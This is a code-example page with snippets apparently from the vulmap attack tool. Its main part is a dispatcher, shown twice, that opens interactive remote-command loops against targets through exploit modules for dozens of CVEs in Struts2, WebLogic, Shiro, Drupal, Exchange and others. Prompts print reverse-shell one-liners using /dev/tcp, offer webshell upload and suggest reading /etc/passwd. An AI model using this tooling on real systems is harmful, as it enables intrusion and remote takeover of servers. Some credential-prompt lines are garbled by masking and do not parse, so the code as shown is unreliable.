                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    # Branches that need extra operator input (key, gadget, file path or
    # credentials) come first; each prompts in colour on linux/other and
    # without colour on windows.
    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    # The next four branches share one shape: print an example path, then
    # loop reading a file name and pass it to the module.
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        # NOTE(review): the username/password prompt lines of this branch are
        # damaged in this listing: the text between the two prompt strings has
        # been replaced by `******` (it looks like a credential-masking filter
        # on the hosting page), which swallowed the password assignment, the
        # windows `elif` and the `while True:` header.  The lines are kept
        # verbatim and do not parse as shown; restore them from the upstream
        # file.  The password prompt appears to use input(), which echoes what
        # is typed; getpass would avoid that -- confirm upstream.
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)

    # Remote-command-execution modules share one simple prompt loop: read a
    # line, quit on exit/quit/bye, otherwise hand it to the matching method.
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            # NOTE(review): both operands below are the upper-case spelling,
            # unlike every sibling test, so a lower-case id that passed the
            # explists check would reach the final `else: pass` and the loop
            # would keep prompting without calling anything.
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            # The fastjson ids are version strings, matched exactly.
            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)
            else:
                # An id that is in explists but matches no test above lands
                # here; nothing is called and the loop prompts again.
                pass
Exemplo n.º 17
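def require():
    """Check that the third-party modules this tool needs can be imported.

    ``gevent`` is imported first (and ``monkey.patch_all()`` applied), then
    the pycryptodome ``Crypto`` modules.  If either import fails, a hint to
    run ``pip3 install -r requirements.txt`` is printed and the process exits
    with status 0.

    The bundled-tarball installers further down only run for names found in
    ``require_list``.  Nothing in this function adds to that list, so they
    are unreachable as written; they are kept, hardened, in case the
    offline-install path is switched back on.
    """
    pwd_vulmap = os.path.split(os.path.realpath(sys.argv[0]))[0]

    def _notice(tag, text):
        """Print one timestamped status line; *tag* is a color prefix function."""
        print(now.timed(de=0) + tag() + color.yellow(text))

    def _inside(root, candidate):
        """Return True when *candidate* resolves to a path at or below *root*."""
        return os.path.commonpath([root, os.path.realpath(candidate)]) == root

    def _install_bundled(prompt, archive_name, package_dir, where_msg,
                         done_msg, failed_msg):
        """Ask for consent, unpack ./thirdparty/<archive_name> and install it."""
        # Imported here so the module is only loaded on this rarely used path.
        import subprocess

        if input(now.timed(de=0) + color.yel_info() + color.yellow(prompt)) != "y":
            return
        try:
            pwd_packages = sysconfig.get_paths()["purelib"]
            dest_root = os.path.realpath(pwd_packages)
            archive_path = os.path.join(pwd_vulmap, "thirdparty", archive_name)
            # NOTE(review): the archive is trusted as shipped; no digest is
            # verified before its contents land in site-packages.
            with tarfile.open(archive_path) as archive:
                members = archive.getmembers()
                # Validate every entry before writing anything: a member name
                # or link target that resolves outside site-packages would
                # otherwise let the archive overwrite arbitrary files.
                for member in members:
                    landing = os.path.join(dest_root, member.name)
                    if not _inside(dest_root, landing):
                        raise ValueError("unsafe path in archive: " + member.name)
                    if member.issym() or member.islnk():
                        # Symlink targets are relative to the link's own
                        # directory, hard-link targets to the archive root.
                        base = (os.path.dirname(landing) if member.issym()
                                else dest_root)
                        if not _inside(dest_root,
                                       os.path.join(base, member.linkname)):
                            raise ValueError(
                                "unsafe link in archive: " + member.name)
                archive.extractall(path=pwd_packages, members=members)

            # Run setup.py with the interpreter that is executing this script
            # (the one whose purelib was used above) and without a shell,
            # rather than whatever "python3" resolves to on PATH.
            try:
                status = subprocess.run(
                    [sys.executable, "setup.py", "install"],
                    cwd=os.path.join(pwd_packages, package_dir),
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL,
                ).returncode
            except OSError:
                status = -1
            if status == 0:
                _notice(color.yel_info, where_msg + pwd_packages)
                _notice(color.yel_info, done_msg)
            else:
                _notice(color.red_warn, failed_msg)
        except Exception as error:  # best-effort installer: report, don't crash
            if isinstance(error, PermissionError) or r"Permission" in str(error):
                _notice(
                    color.red_warn,
                    " Permission denied: Need root privileges or \"sudo xxxx\"")
            else:
                _notice(color.red_warn, " Installation aborted: " + str(error))

    def install_gevent():
        """Offer to install the bundled gevent tarball."""
        _install_bundled(
            " Gevent dependency not found, install it now (y/n): ",
            "gevent.tar.gz",
            "gevent",
            " gevent install to: ",
            " gevent dependency installation is complete",
            " gevent installation failed, please use \" pip3 install gevent\" to install",
        )

    def install_crypto():
        """Offer to install the bundled pycryptodome tarball."""
        _install_bundled(
            " pycryptodome dependency not found, install it now (y/n): ",
            "pycryptodome.tar.gz",
            "pycryptodome",
            " pycryptodome install to: ",
            " Crypto dependency installation is complete",
            " Crypto installation failed, please use \" pip3 install pycryptodome\" to install",
        )

    # Stays empty: both handlers below exit instead of recording the name.
    require_list = []
    try:
        from gevent import monkey
        monkey.patch_all()
    except ImportError:
        _notice(
            color.red_warn,
            " Not find \"gevent\", please use \" pip3 install -r requirements.txt\" to install")
        sys.exit(0)
    try:
        # Imported only to prove pycryptodome is available.
        from Crypto.Cipher import AES
        from Crypto.Util.Padding import pad
    except ImportError:
        _notice(
            color.red_warn,
            " Not find \"pycryptodome\", please use \" pip3 install -r requirements.txt\" to install")
        sys.exit(0)

    missing = [name for name in ("gevent", "crypto") if name in require_list]
    if missing:
        print(banner())  # show a random banner
        if r"gevent" in missing:
            install_gevent()
        if r"crypto" in missing:
            install_crypto()
        sys.exit(0)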
Exemplo n.º 18
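def output_json(filename, data):
    """Append one finding to the JSON report at *filename*.

    The report is a JSON list; each call loads the existing list (if the
    file exists), appends one record built from *data* and rewrites the file
    as UTF-8.

    Args:
        filename: Path of the report file to create or extend.
        data: Mapping with the keys ``vul_data``, ``vul_urls``, ``prt_name``,
            ``vul_payd``, ``vul_type``, ``cre_auth`` and ``vul_name``.

    Errors while parsing or writing are reported on stdout (source file and
    line number only) and are not raised to the caller.

    The record stores the raw request, response and payload, so the report
    can contain cookies, tokens or credentials captured during a scan and
    should be stored and shared as sensitive data.
    """
    vul_data = data["vul_data"]
    try:
        if r">_<" in vul_data:
            # presumably a marker for "no raw HTTP exchange captured";
            # the text is stored as-is in both fields -- verify with callers
            vul_requ = vul_data
            vul_resp = vul_data
            vul_path = ""
        else:
            # The dump is the request followed by "\r\n> HTTP/" and the
            # response; "< " and "> " are stripped from each half.
            vul_requ = re.findall(r'([\s\S]*)\r\n> HTTP/', vul_data)[0]
            vul_requ = vul_requ.replace("< ", "")
            vul_resp = re.findall(r'\r\n> HTTP/([\s\S]*)', vul_data)[0]
            vul_resp = "HTTP/" + vul_resp.replace("> ", "")
            vul_path = re.findall(r' /(.*) HTTP', vul_data)[0]
    except Exception as error:
        print(
            now.timed(de=0) +
            color.red("[ERROR] " +
                      error.__traceback__.tb_frame.f_globals['__file__'] +
                      " " + str(error.__traceback__.tb_lineno)))
        vul_path = ""
        vul_requ = ""
        vul_resp = ""

    try:
        vul_urls = data["vul_urls"]
        host_port = urlparse(vul_urls)
        vul_host = host_port.hostname
        vul_port = host_port.port
        if vul_host is None:
            raise ValueError("target URL has no host component: " + vul_urls)

        # Decide on the parsed scheme, not on a substring search: an http URL
        # whose path or query merely contains "https://" must stay http/80.
        scheme = host_port.scheme.lower()
        if scheme not in ("http", "https"):
            scheme = None
        if vul_port is None and scheme is not None:
            vul_port = 443 if scheme == "https" else 80

        # urlparse strips the brackets from an IPv6 literal; restore them so
        # the rebuilt URL stays parseable.
        url_host = "[" + vul_host + "]" if ":" in vul_host else vul_host
        if scheme is None:
            # Unknown scheme: report an http URL without a port.
            vul_u = "http://" + url_host + "/" + vul_path
        else:
            vul_u = (scheme + "://" + url_host + ":" + str(vul_port) + "/" +
                     vul_path)

        json_data = {
            "create_time": int(round(time.time() * 1000)),  # epoch millis
            "detail": {
                "author": data["cre_auth"],
                "description": data["vul_name"],
                "host": vul_host,
                "param": {},
                "payload": data["vul_payd"],
                "port": vul_port,
                "request": vul_requ,
                "response": vul_resp,
                "url": vul_u
            },
            "plugin": data["prt_name"],
            "target": {
                "url": vul_urls
            },
            "vuln_class": data["vul_type"]
        }

        def write_json(obj):
            """Load the current report list, append *obj* and rewrite the file."""
            item_list = []
            if os.path.isfile(filename):
                # Read with the encoding used for writing; the platform
                # default can fail on non-ASCII text, which would drop the
                # new finding.
                with open(filename, 'r', encoding='utf-8') as f:
                    item_list = json.load(f)
                if not isinstance(item_list, list):
                    # Refuse to overwrite a file that is not a report list.
                    raise ValueError(filename + " does not hold a JSON list")
            item_list.append(obj)
            with open(filename, 'w', encoding='utf-8') as f2:
                json.dump(item_list, f2, indent=4, ensure_ascii=False)

        write_json(json_data)
    except Exception as error:
        print(
            now.timed(de=0) +
            color.red("[ERROR] " +
                      error.__traceback__.tb_frame.f_globals['__file__'] +
                      " " + str(error.__traceback__.tb_lineno)))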
Exemplo n.º 19
 def timeout_print(prt_name):
     """Print a timestamped warning that the check named *prt_name* timed out."""
     message = " " + prt_name + " check failed because timeout !!!"
     # The timestamp helper is given the global DELAY setting.
     stamp = now.timed(de=globals.get_value("DELAY"))
     print(stamp + color.red_warn() + color.cyan(message))
Exemplo n.º 20
 def identify_prt(name):
     """Show which product *name* is currently being fingerprinted.

     The line starts with a carriage return and ends with padding spaces
     instead of a newline, so successive calls overwrite one console line.
     """
     stamp = now.timed(de=0)
     tag = color.yel_info()
     label = color.cyan(
         " Identify whether the target is: " + color.magenta(name))
     print(f"\r{stamp}{tag}{label}", end="          ")
Exemplo n.º 21
def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    exp_apache_druid = ApacheDruid(target)
    exp_laravel = Laravel(target)
    exp_vmware = Vmware(target)
    exp_saltstack = SaltStack(target)
    exp_exchange = Exchange(target)
    exp_big_ip = BIG_IP(target)
    exp_apache_ofbiz = ApacheOFBiz(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\""
    )
    cmd = "whoami"  # 为了消除pycharm错误提示,没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示,没啥用
    path = "/tmp/test"  # 为了消除pycharm错误提示,没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示,没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示,没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示,没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示,没啥用
    laravel_key = "null"  # 为了消除pycharm错误提示,没啥用
    laravel_gadget = 1  # 为了消除pycharm错误提示,没啥用

    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
    elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
        if os_check() == "linux" or os_check() == "other":
            laravel_key = input(
                now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
        elif os_check() == "windows":
            laravel_key = input(
                now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
        if os_check() == "linux" or os_check() == "other":
            laravel_gadget = input(
                now.timed(de=delay) + color.green(
                    "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
        elif os_check() == "windows":
            laravel_gadget = input(
                now.no_color_timed(de=delay) +
                "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
    elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
        if os_check() == "linux" or os_check() == "other":
            os_type = input(
                now.timed(de=delay) +
                color.green("[+] The target os type (linux/windows): "))
        elif os_check() == "windows":
            os_type = input(
                now.no_color_timed(de=delay) +
                "[+] The target os type (linux/windows): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_vmware.cve_2021_21972_exp(cmd, os_type)
    elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
        if os_check() == "linux" or os_check() == "other":
            file = input(
                now.timed(de=delay) + color.green("[+] upload file: "))
            path = input(
                now.timed(de=delay) +
                color.green("[+] upload path (e.g. /tmp/test.txt): "))
        elif os_check() == "windows":
            file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
            path = input(
                now.timed(de=delay) +
                color.green("[+] upload path (e.g. /tmp/test.txt): "))
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_saltstack.cve_2021_25282_exp(cmd, file, path)
    elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
        if os_check() == "linux" or os_check() == "other":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(
                now.timed(de=delay) +
                color.green("[+] webshell name (e.g. shell.aspx): "))
        elif os_check() == "windows":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(
                now.no_color_timed(de=delay) +
                "[+] uwebshell name (e.g. shell.aspx: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_exchange.cve_2021_27065_exp(cmd, file, email)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
